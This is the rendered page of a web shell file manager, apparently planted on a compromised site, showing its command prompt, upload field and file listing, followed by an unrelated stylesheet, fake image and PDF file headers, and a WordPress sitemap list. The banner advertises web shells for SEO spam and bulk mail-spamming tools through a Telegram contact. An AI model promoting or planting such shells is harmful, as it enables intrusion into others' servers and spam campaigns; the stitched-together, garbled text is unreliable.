xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
body {
  background-color: white;
  border: 0px;
  margin: 0px;
  padding: 0px;
}

.corner {
  width: 200px;
  height: 80px;
  text-align: center;
}

.banner {
  background-color: rgb(110,139,61);
  color: rgb(255,236,176);
  padding-left: 2em;
}

.banner h1 {
  font-size: 200%;
}

.content {
  padding: 0em 2em 1em 2em;
}

.releaseno {
  background-color: rgb(110,139,61);
  color: rgb(255,236,176);
  padding-bottom: 0.3em;
  padding-top: 0.5em;
  text-align: center;
  font-weight: bold;
}

.noborder {
  border-width: 0px;
}

.eg {
  padding-left: 1em;
  padding-top: .5em;
  padding-bottom: .5em;
  border: solid thin;
  margin: 1em 0;
  background-color: tan;
  margin-left: 2em;
  margin-right: 10%;
}

.pseudocode {
  padding-left: 1em;
  padding-top: .5em;
  padding-bottom: .5em;
  border: solid thin;
  margin: 1em 0;
  background-color: rgb(250,220,180);
  margin-left: 2em;
  margin-right: 10%;
}

.handler {
  width: 100%;
  border-top-width: thin;  
  margin-bottom: 1em;
}

.handler p {
  margin-left: 2em;
}

.setter {
  font-weight: bold;
}

.signature {
  color: navy;
}

.fcndec {
  width: 100%;
  border-top-width: thin;
  font-weight: bold;
}

.fcndef {
  margin-left: 2em;
  margin-bottom: 2em;
}

dd {
  margin-bottom: 2em;
}

.cpp-symbols dt {
  font-family: monospace;
}
.cpp-symbols dd {
  margin-bottom: 1em;
}

Filemanager

Name Type Size Permission Actions
examples Folder 0755
Changes File 11.11 KB 0644
README File 5.65 KB 0644
expat.png File 1 KB 0644
expatfaq.html File 3.18 KB 0644
reference.html File 92.72 KB 0644
style.css File 1.31 KB 0644
valid-xhtml10.png File 2.31 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml